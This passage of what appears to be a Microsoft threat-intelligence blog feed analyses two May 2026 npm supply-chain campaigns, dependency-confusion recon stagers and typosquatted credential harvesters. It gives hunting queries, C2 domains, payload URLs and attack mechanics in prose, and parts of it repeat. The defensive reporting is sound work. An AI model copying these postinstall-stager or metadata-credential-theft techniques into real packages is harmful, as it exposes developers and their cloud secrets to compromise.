"@t-in-one", "@capibar.chat", "@sber-ecom-core", "node_modules")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine,
AccountName
Hunt for dropped stager payloads in temp and cache directories.
Searches device file events for the ._<scope>_init.js payload pattern and the May 29 run-once marker directory.
DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName matches regex @"^\._.*_init\.js$"
or FolderPath has_any (
".cache/._cloudplatform-single-spa_init",
".cache/._wb-track_init",
".cache/._t-in-one_init")
| project Timestamp, DeviceName, FolderPath, FileName, ActionType,
InitiatingProcessFileName, InitiatingProcessCommandLine
Hunt for the campaign-wide X-Secret header in outbound HTTP traffic.
Searches for outbound web traffic carrying the hardcoded X-Secret value used by all three operator accounts (requires TLS decryption or proxy logging that captures request headers or bodies).
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where AdditionalFields has "l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1"
or RemoteUrl has "oob.moika.tech"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, AdditionalFields,
InitiatingProcessFileName, InitiatingProcessCommandLine
Hunt for affected dependency references in developer directories.
Searches for package manifest or lockfile activity referencing the affected scoped packages.
DeviceFileEvents
| where FileName in~ ("package.json", "package-lock.json", "yarn.lock",
"pnpm-lock.yaml", ".npmrc")
| where FolderPath has_any ("node_modules", "src", "repo", "workspace")
| where AdditionalFields has_any (
"@cloudplatform-single-spa", "@wb-track", "@data-science",
"@ce-rwb", "@payments-widget", "@travel-autotests",
"@t-in-one", "@capibar.chat", "@sber-ecom-core")
| project Timestamp, DeviceName, FolderPath, FileName,
InitiatingProcessFileName, InitiatingProcessCommandLine
| Indicator | Type | Description |
| mr.4nd3r50n | npm maintainer | Threat actor (mr.4nd3r50n) — 26 packages, May 28 wave |
| ce-rwb | npm maintainer | Threat actor (ce-rwb) — 7 packages, May 28 wave |
| mr.4nd3r50n@yandex[.]ru | mr.4nd3r50n contact email | |
| ogvanta@yandex[.]ru | ce-rwb contact email | |
| t-in-one | npm maintainer | Threat actor (t-in-one) — 12 packages across @t-in-one, @capibar.chat, @sber-ecom-core, May 29 wave |
| t-in-one@yandex[.]ru | t-in-one contact email | |
| l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1 | Shared secret | Hardcoded X-Secret HTTP header value sent on every outbound C2 request from all three accounts — single-operator attribution marker |
| npm.t-in-one[.]io | Lure domain | Fabricated internal-registry hostname referenced in @t-in-one README to lend legitimacy |
| docs.t-in-one[.]io / jira.t-in-one[.]io | Lure domain | Fabricated documentation and issue-tracker hostnames in @t-in-one package metadata |
| `oob.moika[.]tech` | Domain | C2 server for payload delivery |
| `https://oob.moika[.]tech/payload/win` | URL | Windows payload endpoint |
| `https://oob.moika[.]tech/payload/mac` | URL | macOS payload endpoint |
| `https://oob.moika[.]tech/payload/linux` | URL | Linux payload endpoint |
| Indicator | Type | Description |
| `scripts/postinstall.js` | Filename | Obfuscated stager (~7 KB) |
| `._cloudplatform-single-spa_init.js` | Filename | Dropped payload in tmpdir |
| `._wb-track_init.js` | Filename | Dropped payload (ce-rwb variant) |
| `~/.cache/._cloudplatform-single-spa_init/` | Directory | Cache/dedup directory |
| `~/.cache/._wb-track_init/` | Directory | Cache/dedup directory (ce-rwb) |
| `*_RECON_ONLY=1` | Env var | Reconnaissance mode flag |
| `*_PKG` | Env var | Package name identifier |
| `*_VER` | Env var | Package version identifier |
| `*_SECRET` | Env var | C2 authentication token |
| ._t-in-one_init.js | Filename | Dropped payload in tmpdir — t-in-one (May 29 wave) |
| ~/.cache/._t-in-one_init/ | Directory | Run-once marker directory used by the May 29 stager for per-host deduplication |
| T_IN_ONE_NO_TELEMETRY | Env var | Functional install-time kill switch honored by the May 29 obfuscated stager (the May 28 *_NO_TELEMETRY variables are README fiction only) |
| X-Secret: l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1 | HTTP header | Hardcoded authentication header sent on every outbound C2 request from all three accounts |
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
The post Malicious npm packages abuse dependency confusion to profile developer environments appeared first on Microsoft Security Blog.
Hackers published 96 malicious package versions, injected with a credential-stealing worm similar to Mini Shai-Hulud.
The post Supply Chain Attack Hits 32 Red Hat NPM Packages appeared first on SecurityWeek.
Microsoft Threat Intelligence has uncovered an active supply chain attack involving malicious npm packages registered under organizational scopes that mirror real internal corporate namespaces, employing dependency confusion technique to deploy an obfuscated reconnaissance payload.
On May 28 and May 29, 2026, a threat actor operating under three maintainer aliases mr.4nd3r50n (mr.4nd3r50n@yandex[.]ru), ce-rwb (ogvanta@yandex[.]ru), and t-in-one (t-in-one@yandex[.]ru) published malicious packages across two publishing bursts. The packages impersonate internal corporate packages across nine different organizational scopes using a dependency confusion technique, and several spoof internal enterprise infrastructure URLs (GitHub Enterprise, Jira, documentation portals) in their package.json to appear legitimate. Once installed, the packages download and execute an obfuscated reconnaissance payload from an attacker-controlled command-and-control (C2) server.
All packages in the cluster ship the same heavily obfuscated postinstall stager and connect to the same C2 endpoint, a ~17 KB JavaScript dropper used for for environment fingerprinting and credential reconnaissance. The payload runs silently during npm install and operates in “reconnaissance-only” mode, collecting system information, hostnames, environment variables, and developer context. The architecture includes a RECON_ONLY flag that can be toggled server-side for full exploitation in follow-on attacks. Based on our investigation and feedback to the npm team these repos and users were taken down.
Key capabilities observed in the campaign include automatic execution through npm lifecycle hooks, obfuscator.io-style anti-analysis techniques, platform-specific payload delivery (Windows, macOS, Linux), continuous integration and continuous delivery (CI/CD) environment detection and bypass, cache-based deduplication to evade repeated-execution monitoring, and a two-phase attack design (reconnaissance now, exploitation later).
The campaign spans dozens of scoped packages published under three npm maintainer accounts that our forensic analysis attributes to a single operator (detailed in the Attribution section below). The attack proceeds through:
The actor adopted three social-engineering techniques designed to drive installs through misconfigured package managers or developer trust transference:
The attacker registered packages under organizational scopes that mirror real internal corporate namespaces: @cloudplatform-single-spa, @wb-track, @data-science, @ce-rwb, @payments-widget, @travel-autotests, @t-in-one, @capibar.chat, and @sber-ecom-core. Package names like svp-baas, enterprise, monitoring, ssh-keys, shared-front, payments-widget-sdk, add_application_service_token, ui-kit, and sberpay-widget target specific internal services — the last of which directly impersonates Sberbank’s SberPay payment widget.
Every package sets its package.json homepage, repository, bugs, and author fields to fabricated but realistic-looking internal infrastructure URLs. For example:
These URLs follow the pattern of enterprise GitHub, Jira, and documentation portals, lending an air of legitimacy designed to evade casual inspection during code review.
mr.4nd3r50n uses version 100.100.100, an absurdly high version number designed to win npm’s server resolution against any real internal package version. ce-rwb uses a more realistic 3.5.22 to blend in with legitimate release histories. t-in-one mixes both tactics: the ten @t-in-one packages ship at 5.7.1, while @capibar.chat/ui-kit (99.5.7) and @sber-ecom-core/sberpay-widget (99.5.8) use inflated numbers — and both of the latter scopes were pre-staged with 99.0.7 releases on 2026-05-04, weeks before the main bursts.
npm install. Version 100.100.100 ensures the malicious package wins dependency resolution over any real internal version.Every package in the cluster declares an automatic install-time hook in package.json:
"scripts": {
"build": "tsc --noEmit || true",
"test": "node test/index.test.js",
"postinstall": "node scripts/postinstall.js",
"prepublishOnly": "echo 'Building...'"
}
The malicious code executes the moment a victim runs npm install; no require() from victim code is needed. The build and test scripts are cosmetic, designed to make the package appear to have a legitimate development workflow.
scripts/postinstall.js is approximately 7 KB of heavily obfuscated JavaScript using obfuscator.io-style techniques:
The deobfuscated execution flow proceeds through eight distinct stages:
The environment variables passed to the spawned payload reveal a deliberate two-phase attack architecture:
| Variable | Purpose |
| *_RECON_ONLY | Set to “1” by default; limits payload to reconnaissance |
| *_PKG | Identifies which internal package triggered the execution |
| *_VER | Package version for campaign tracking |
| *_SECRET | Hard-coded authentication token for C2 communication |
The RECON_ONLY flag is hard-coded to “1” in the current campaign, indicating the attacker is in Reconnaissance — collecting environment information, hostnames, installed packages, and developer context. The architecture supports a Full exploitation mode where the flag can be toggled server-side to enable data exfiltration, credential theft, or backdoor installation on previously fingerprinted targets.
This two-phase design is sophisticated: it minimizes the risk of detection during initial deployment while building a target inventory for selective, high-value exploitation later.
Forensic analysis of npm registry metadata across every package in the cluster provides high-confidence evidence that the three accounts (mr.4nd3r50n, ce-rwb, and t-in-one) are operated by the same individual. The single strongest piece of evidence is a shared hardcoded authentication value, l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1, sent as the X-Secret HTTP header on every outbound C2 request from every package in all three accounts.
Both accounts’ payloads connect to the exact same C2 server: https://oob.moika[.]tech/payload. Sharing offensive infrastructure across “separate” personas is the strongest single indicator of a single operator. Maintaining separate C2 servers would be trivial, so using the same one indicates the shared infrastructure supports our assessment that the activity is associated with a single operator.
mr.4nd3r50n’s early versions (v99.99.99) were published with Node.js 20.20.1 / npm 10.8.2. ce-rwb’s packages were published with Node.js 20.20.0 / npm 10.8.2. t-in-one’s @t-in-one packages were published with Node.js 20.20.1 / npm 10.8.2 — matching mr.4nd3r50n exactly. The minor variance across the three accounts suggests the same machine at slightly different patch levels, or a small set of machines configured from the same provisioning script.
Both actors use the exact same templating system for generating fake package metadata:
This level of template consistency, down to identical changelog entries across every package, including the @t-in-one README that points developers at a fabricated internal registry at npm.t-in-one[.]io with matching docs.t-in-one[.]io and jira.t-in-one[.]io references — indicates a single automated package generator.
mr.4nd3r50n published 26 packages between 18:47–18:51 UTC on May 28. ce-rwb published 7 packages between 19:02–19:03 UTC on May 28 — a 12-minute gap consistent with one person completing one publishing batch, switching npm accounts, and starting the next. t-in-one returned the following day, publishing 10 @t-in-one packages between 09:01:56 and 09:02:39 UTC on May 29 (a 43-second automated burst), with the @capibar.chat and @sber-ecom-core republishes following minutes later. The ~14-hour overnight gap between ce-rwb and t-in-one, paired with the unchanged C2 host and identical X-Secret, indicates the same operator returning to expand the campaign rather than a separate group.
The @cloudplatform-single-spa/logaas package reveals a critical piece of the actor’s history:
This timeline shows mr.4nd3r50n began as a bug bounty researcher probing npm dependency confusion in April 2024 followed by the malicious packages observed in this campaign.y approximately two years later. The ce-rwb account has no prior publishing history, suggesting it was created specifically for the May 2026 campaign as a secondary persona to broaden the attack surface across additional organizational scopes.
All packages use the scope @cloudplatform-single-spa:
| Package | Description |
| svp-baas | Database/Backend-as-a-Service |
| enterprise | Enterprise platform |
| vpn | VPN service |
| monitoring | Monitoring platform |
| dataplatform-trino | Trino data platform |
| marketplace-gigachat | GigaChat marketplace |
| support | Support tools |
| svp-s3-storage | S3 storage service |
| ml-ai-agents-agent | ML/AI agents |
| ssh-keys | SSH key management |
| security-groups | Security groups |
| employees | Employee directory |
| cp-api-gw | API gateway |
| base-static-page | Static page framework |
| administration | Administration panel |
| ml-ai-agents-agent-system | AI agent system |
| arenadata-db | ArenaData database |
| business-solutions | Business solutions |
| dataplatform-metastore | Data metastore |
| cloud-dns | Cloud DNS |
| dataplatform | Data platform |
| datagrid | Data grid |
| floating-ips | Floating IP management |
| cnapp-ui | CNAPP security UI |
| svp-interfaces | SVP interfaces |
| logaas | Logging-as-a-Service |
| Package | Scope Targeted |
| @wb-track/shared-front | WB-Track (warehouse/logistics tracking) |
| @data-science/llm | Data Science / LLM platform |
| @ce-rwb/ce-tools-editor-admin | CE-RWB internal editor tools |
| @ce-rwb/ce-tools-editor-render | CE-RWB internal editor tools |
| @ce-rwb/ce-tools-editor-core | CE-RWB internal editor tools |
| @payments-widget/payments-widget-sdk | Payments processing SDK |
| @travel-autotests/npm-proto | Travel platform test protobuf |
t-in-one returned on May 29 with a third npm account, t-in-one (t-in-one@yandex[.]ru), and expanded the campaign across three previously unused scopes. The ten @t-in-one package names are deliberately credential- and token-themed so they read as internal auth modules; @capibar.chat/ui-kit is a textbook dependency confusion artifact against an internal UI kit; and @sber-ecom-core/sberpay-widget directly impersonates Sberbank’s SberPay payment widget — making the campaign’s financial-sector targeting explicit. Unlike the May 28 wave, the May 29 stager ships a three-layer-obfuscated postinstall (~13 KB) and adds a functional T_IN_ONE_NO_TELEMETRY kill switch and a run-once marker directory at ~/.cache/._t-in-one_init/. The C2 host, payload endpoints, and hardcoded X-Secret value are identical to the May 28 wave.
| Package | Scope Targeted |
| @t-in-one/add_application | T-in-one — credential/auth module |
| @t-in-one/add_app_middleware_token | T-in-one — credential/auth module |
| @t-in-one/get_application_hid | T-in-one — credential/auth module |
| @t-in-one/form_product_token | T-in-one — credential/auth module |
| @t-in-one/application_id_storage_key_token | T-in-one — credential/auth module |
| @t-in-one/only_difference_payload | T-in-one — credential/auth module |
| @t-in-one/prefill_credit_data_token | T-in-one — credential/auth module |
| @t-in-one/prefill_bundle_data_token | T-in-one — credential/auth module |
| @t-in-one/add_application_tid | T-in-one — credential/auth module |
| @t-in-one/add_application_service_token | T-in-one — credential/auth module |
| @capibar.chat/ui-kit | Capibar Chat — internal UI kit |
| @sber-ecom-core/sberpay-widget | Sberbank — impersonation of SberPay payment widget |
Microsoft recommends the following mitigations to reduce the impact of this threat:
Microsoft Defender Antivirus detects and blocks the obfuscated postinstall stager and the detached recon payload on access. During reproduction in our analysis environment, the dropped ._<scope>_init.js stager was automatically quarantined the moment the package tarball was extracted to disk, preventing the C2 beacon to oob.moika[.]tech and blocking the platform-specific second-stage download. Microsoft Defender for Endpoint provides additional behavior-based coverage for the npm lifecycle script-abuse and detached child-process patterns observed in this campaign.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog. Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
| Tactic | Observed activity | Microsoft Defender coverage |
| Execution | Suspicious script execution during npm install or package lifecycle activity tied to the affected scopes | Microsoft Defender Antivirus – Trojan:JS/ObfusNpmJs.SA Microsoft Defender for Endpoint – Suspicious Node.js process behavior – Suspicious detached child process spawned with windowsHide=true – Suspicious file creation in temporary directory by Node.js binary |
| Defense Evasion | Three-layer-obfuscated postinstall.js (obfuscator.io + custom base64 + integer-shuffle string table) and install-time kill switch (T_IN_ONE_NO_TELEMETRY) | Microsoft Defender Antivirus – Trojan:JS/ObfusNpmJs Microsoft Defender for Endpoint – Suspicious obfuscated JavaScript execution – Anomalous environment variable usage in npm lifecycle script |
| Credential Access | Reconnaissance and potential harvesting of environment variables, tokens, and developer secrets via the detached payload | Microsoft Defender for Endpoint – Credential access attempt – Suspicious cloud credential access by npm-spawned process – Environment variable enumeration indicative of credential access Microsoft Defender for Cloud – Possible command injection to exfiltrate credentials from a build pipeline |
| Command and Control | Outbound HTTPS connections from build systems or developer machines to oob.moika[.]tech carrying the hardcoded X-Secret header | Microsoft Defender for Endpoint – Connection to a custom network indicator – Suspicious outbound connection from Node.js process to low-reputation domain |
| Persistence | Run-once marker directory at ~/.cache/._t-in-one_init/ and ._<scope>_init.js payloads dropped in os.tmpdir() and launched with detached: true | Microsoft Defender for Endpoint – Suspicious persistence file creation in user cache directory – Detached Node.js process surviving parent npm install exit |
Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.
Customers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:
Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.
Microsoft Defender XDR customers can reference the Threat analytics report for this campaign in the Microsoft Defender portal at https://security.microsoft.com/threatanalytics3 for the latest indicators, recommended actions, and mitigation status across their estate.
The following sample queries let you search for a week’s worth of events. To explore up to 30 days of raw data, go to the Advanced Hunting page > Query tab, and update the time range to Last 30 days.
Hunt for suspicious npm lifecycle script execution involving the affected scopes.
Searches for Node.js and npm activity involving install lifecycle behavior and references to the nine affected scoped packages.
DeviceProcessEvents
| where FileName in~ ("node.exe", "npm.cmd", "npm.exe", "npx.cmd", "npx.exe")
| where ProcessCommandLine has_any ("preinstall", "postinstall", "install")
| where ProcessCommandLine has_any (
"@cloudplatform-single-spa", "@wb-track", "@data-science",
"@ce-rwb", "@payments-widget", "@travel-autotests",
"@t-in-one", "@capibar.chat", "@sber-ecom-core")
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
AccountName
Hunt for affected package versions in software inventory.
Searches device software inventory for any installed packages from the affected scopes.
DeviceTvmSoftwareInventory
| where SoftwareName has_any (
"cloudplatform-single-spa", "wb-track", "data-science",
"ce-rwb", "payments-widget", "travel-autotests",
"t-in-one", "capibar.chat", "sber-ecom-core")
| project DeviceName, OSPlatform, SoftwareVendor, SoftwareName,
SoftwareVersion
Hunt for outbound C2 activity to oob.moika[.]tech.
Searches for any device network connection to the campaign C2 host.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "oob.moika.tech"
or RemoteUrl has_any ("npm.t-in-one.io", "docs.t-in-one.io",
"jira.t-in-one.io")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort,
InitiatingProcessFileName, InitiatingProcessCommandLine,
AccountName
Hunt for suspicious outbound activity from Node.js processes.
Searches for network connections initiated by Node.js or npm processes referencing the affected scopes or node_modules paths.
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("node.exe", "npm.exe", "npx.exe")
| where InitiatingProcessCommandLine has_any (
"@cloudplatform-single-spa", "@wb-track", "@data-science",
"@ce-rwb", "@payments-widget", "@travel-autotests",
"@t-in-one", "@capibar.chat", "@sber-ecom-core", "node_modules")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine,
AccountName
Hunt for dropped stager payloads in temp and cache directories.
Searches device file events for the ._<scope>_init.js payload pattern and the May 29 run-once marker directory.
DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName matches regex @"^\._.*_init\.js$"
or FolderPath has_any (
".cache/._cloudplatform-single-spa_init",
".cache/._wb-track_init",
".cache/._t-in-one_init")
| project Timestamp, DeviceName, FolderPath, FileName, ActionType,
InitiatingProcessFileName, InitiatingProcessCommandLine
Hunt for the campaign-wide X-Secret header in outbound HTTP traffic.
Searches for outbound web traffic carrying the hardcoded X-Secret value used by all three operator accounts (requires TLS decryption or proxy logging that captures request headers or bodies).
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where AdditionalFields has "l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1"
or RemoteUrl has "oob.moika.tech"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, AdditionalFields,
InitiatingProcessFileName, InitiatingProcessCommandLine
Hunt for affected dependency references in developer directories.
Searches for package manifest or lockfile activity referencing the affected scoped packages.
DeviceFileEvents
| where FileName in~ ("package.json", "package-lock.json", "yarn.lock",
"pnpm-lock.yaml", ".npmrc")
| where FolderPath has_any ("node_modules", "src", "repo", "workspace")
| where AdditionalFields has_any (
"@cloudplatform-single-spa", "@wb-track", "@data-science",
"@ce-rwb", "@payments-widget", "@travel-autotests",
"@t-in-one", "@capibar.chat", "@sber-ecom-core")
| project Timestamp, DeviceName, FolderPath, FileName,
InitiatingProcessFileName, InitiatingProcessCommandLine
| Indicator | Type | Description |
| mr.4nd3r50n | npm maintainer | Threat actor (mr.4nd3r50n) — 26 packages, May 28 wave |
| ce-rwb | npm maintainer | Threat actor (ce-rwb) — 7 packages, May 28 wave |
| mr.4nd3r50n@yandex[.]ru | mr.4nd3r50n contact email | |
| ogvanta@yandex[.]ru | ce-rwb contact email | |
| t-in-one | npm maintainer | Threat actor (t-in-one) — 12 packages across @t-in-one, @capibar.chat, @sber-ecom-core, May 29 wave |
| t-in-one@yandex[.]ru | t-in-one contact email | |
| l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1 | Shared secret | Hardcoded X-Secret HTTP header value sent on every outbound C2 request from all three accounts — single-operator attribution marker |
| npm.t-in-one[.]io | Lure domain | Fabricated internal-registry hostname referenced in @t-in-one README to lend legitimacy |
| docs.t-in-one[.]io / jira.t-in-one[.]io | Lure domain | Fabricated documentation and issue-tracker hostnames in @t-in-one package metadata |
| `oob.moika[.]tech` | Domain | C2 server for payload delivery |
| `https://oob.moika[.]tech/payload/win` | URL | Windows payload endpoint |
| `https://oob.moika[.]tech/payload/mac` | URL | macOS payload endpoint |
| `https://oob.moika[.]tech/payload/linux` | URL | Linux payload endpoint |
| Indicator | Type | Description |
| `scripts/postinstall.js` | Filename | Obfuscated stager (~7 KB) |
| `._cloudplatform-single-spa_init.js` | Filename | Dropped payload in tmpdir |
| `._wb-track_init.js` | Filename | Dropped payload (ce-rwb variant) |
| `~/.cache/._cloudplatform-single-spa_init/` | Directory | Cache/dedup directory |
| `~/.cache/._wb-track_init/` | Directory | Cache/dedup directory (ce-rwb) |
| `*_RECON_ONLY=1` | Env var | Reconnaissance mode flag |
| `*_PKG` | Env var | Package name identifier |
| `*_VER` | Env var | Package version identifier |
| `*_SECRET` | Env var | C2 authentication token |
| ._t-in-one_init.js | Filename | Dropped payload in tmpdir — t-in-one (May 29 wave) |
| ~/.cache/._t-in-one_init/ | Directory | Run-once marker directory used by the May 29 stager for per-host deduplication |
| T_IN_ONE_NO_TELEMETRY | Env var | Functional install-time kill switch honored by the May 29 obfuscated stager (the May 28 *_NO_TELEMETRY variables are README fiction only) |
| X-Secret: l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1 | HTTP header | Hardcoded authentication header sent on every outbound C2 request from all three accounts |
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
The post Malicious npm packages abuse dependency confusion to profile developer environments appeared first on Microsoft Security Blog.
Microsoft has identified an active supply chain attack targeting the npm package ecosystem. On May 28, 2026, a single threat actor operating under the newly created maintainer alias vpmdhaj (a39155771@gmail[.]com) published 14 malicious packages within a four-hour window. The packages typosquat well-known OpenSearch, ElasticSearch, DevOps, and environment-configuration libraries, and several spoof the upstream OpenSearch project’s repository URL in their package.json to appear legitimate. Once installed, the packages harvest AWS credentials, HashiCorp Vault tokens, and CI/CD pipeline secrets from the host environment.
All packages in the cluster ship the same install-time stager and the same Bun-compiled second-stage payload – a ~195 KB credential harvester purpose-built for cloud and CI/CD environments. The payload runs silently during npm install and targets credentials across Amazon Web Services, HashiCorp Vault, GitHub Actions, and the npm registry itself, enabling both cloud lateral movement and downstream supply-chain pivoting through stolen npm publish tokens. Based on our investigation and feedback to the npm team these repos and users were taken down.
Key capabilities observed in the campaign include automatic execution via npm lifecycle hooks, two distinct stager generations (an HTTP-C2 variant and a stealthier variant that abuses the legitimate Bun runtime distribution), AWS Instance Metadata Service (IMDSv2) and ECS task-role theft, AWS Secrets Manager enumeration across 16+ regions, HashiCorp Vault token harvesting, and theft of npm publish tokens for follow-on supply-chain attacks.
The vpmdhaj cluster spans 14 scoped and unscoped packages that all mimic the @opensearch / @elastic ecosystem. The attack proceeds through:
The actor adopted three social-engineering techniques designed to drive installs by mistake or trust transference. First, lookalike naming – names such as opensearch-setup, opensearch-setup-tool, opensearch-config-utility, elastic-opensearch-helper, search-engine-setup, and env-config-manager mimic well-known cluster-management and configuration libraries. Second, spoofed upstream metadata – every unscoped package sets its package.json homepage, repository, and bugs fields to the legitimate github.com/opensearch-project/opensearch-js project. Third, inflated version numbers – releases jump straight to 1.0.7265, 1.0.9108, or 2.1.9201 to suggest a long, mature release history.
Every package in the cluster declares an automatic install-time hook in package.json. The malicious code executes the moment a victim runs npm install – no require() from victim code is needed. Two stager variants were observed:
preinstall.js collects rich host context – hostname, platform, arch, Node version, USER/USERNAME, cwd, INIT_CWD, npm_package_name, npm_package_version – base64-encodes the JSON, and POSTs it to the actor’s C2 with a campaign-unique header X-Supply: 1. The same C2 endpoint then serves a gunzip-compressed second-stage binary, which is written to payload.bin in the package install directory, chmod 0755’d, and spawned detached.
The package’s index.js re-launches the same payload.bin on every subsequent require() of the module – a quiet persistence mechanism that survives across CI build stages and developer rebuild loops. The module also exports a benign-looking object falsely identifying itself as @opensearch/setup.
In newer versions, the actor replaced the noisy HTTP-C2 design with a stealthier loader that eliminates the install-time C2 round-trip entirely. setup.mjs (a) checks whether bun is already present on the host; (b) if not, downloads the legitimate Bun runtime v1.3.13 from github.com/oven-sh/bun/releases for the correct platform/arch (Linux x64/musl/aarch64, macOS x64/arm64, Windows x64/arm64); (c) extracts the ZIP using unzip, PowerShell Expand-Archive, or a hand-rolled ZIP parser; and (d) executes the pre-bundled second-stage payload (opensearch_init.js or ai_init.js) that ships inside the npm tarball.
This design reduces visibility for defenders that primarily monitor unusual outbound traffic during package installation.
The second-stage binary is a single-file Bun-compiled JavaScript binary of approximately 195 KB, purpose-built for cloud and CI/CD secret theft. Static review of the bundle identifies routines that target secrets across five platforms:
Microsoft recommends the following mitigations to reduce the impact of this threat:
Microsoft Defender Antivirus detects and blocks the malicious components on access. During reproduction in our analysis environment, setup.mjs was automatically quarantined the moment the tarball was extracted to disk.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
| Tactic | Observed activity | Microsoft Defender coverage |
| Initial Access / Execution | Suspicious script execution during npm install or package lifecycle activity | Microsoft Defender Antivirus -Trojan:JS/ShaiWorm -Trojan:JS/ObfusNpmJs -Backdoor:JS/SupplyChain Microsoft Defender for Endpoint – Suspicious usage of Bun runtime – Suspicious installation of Bun runtime – Suspicious Node.js process behavior Microsoft Defender XDR – Suspicious file creation in temporary directory by node.exe – Suspicious Bun execution from Node.js process |
| Credential Access | Potential harvesting of AWS, Vault, GitHub Actions, and npm tokens from CI/CD runners | Microsoft Defender for Endpoint – Credential access attempt – Suspicious cloud credential access by npm-cached binary – AWS Instance Metadata Service access from suspicious process Microsoft Defender for Cloud – Possible IMDS abuse from container workload – Anomalous Secrets Manager enumeration across regions |
| Command and Control | Outbound HTTP beacon with X-Supply: 1 header to attacker-controlled C2 | Microsoft Defender for Endpoint – Connection to a custom network indicator (aab.sportsontheweb[.]net) – Suspicious outbound HTTP from npm install context |
| Persistence | Re-spawn of payload.bin on every require() of compromised package | Microsoft Defender for Endpoint – Detached child process spawned by node.exe with __DAEMONIZED=1 |
The following sample queries let you search for a week’s worth of events. To explore up to 30 days of raw data, go to the Advanced Hunting page > Query tab, and update the time range to Last 30 days.
Hunt for suspicious npm lifecycle script execution involving vpmdhaj packages.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("node.exe", "node", "npm.cmd", "npm.exe", "npx.cmd", "npx.exe")
| where ProcessCommandLine has_any ("preinstall", "postinstall", "install")
| where ProcessCommandLine has_any (
"@vpmdhaj", "opensearch-setup", "opensearch-setup-tool",
"opensearch-config-utility", "opensearch-security-scanner",
"search-engine-setup", "search-cluster-setup",
"elastic-opensearch-helper", "vpmdhaj-opensearch-setup",
"env-config-manager", "app-config-utility")
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for the stage-2 payload artifact on disk.
DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName =~ "payload.bin"
| where FolderPath has "node_modules"
| project Timestamp, DeviceName, FolderPath, FileName,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for detached payload execution with the campaign environment marker.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has "__DAEMONIZED=1"
or InitiatingProcessCommandLine has "__DAEMONIZED=1"
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine
Hunt for Gen-2 loader: Bun runtime download from GitHub Releases by Node.js.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("node.exe", "node")
| where RemoteUrl has "github.com/oven-sh/bun/releases/download"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for C2 beacon to attacker infrastructure.
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has "aab.sportsontheweb.net"
or RemoteUrl has "sportsontheweb.net"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for AWS IMDS / ECS metadata access from Node.js processes.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("node.exe", "node", "bun.exe", "bun")
| where RemoteIP in ("169.254.169.254", "169.254.170.2")
| project Timestamp, DeviceName, RemoteIP, RemoteUrl,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Affected npm packages – all published by maintainer vpmdhaj on 2026-05-28:
| Indicator | Type | Description |
| @vpmdhaj/elastic-helper (1.0.7269) | Package | Typosquat – ElasticSearch/OpenSearch helper |
| @vpmdhaj/devops-tools (1.0.7267) | Package | Typosquat – DevOps tools / OpenSearch setup |
| @vpmdhaj/opensearch-setup (1.0.7267) | Package | Typosquat – OpenSearch setup utility |
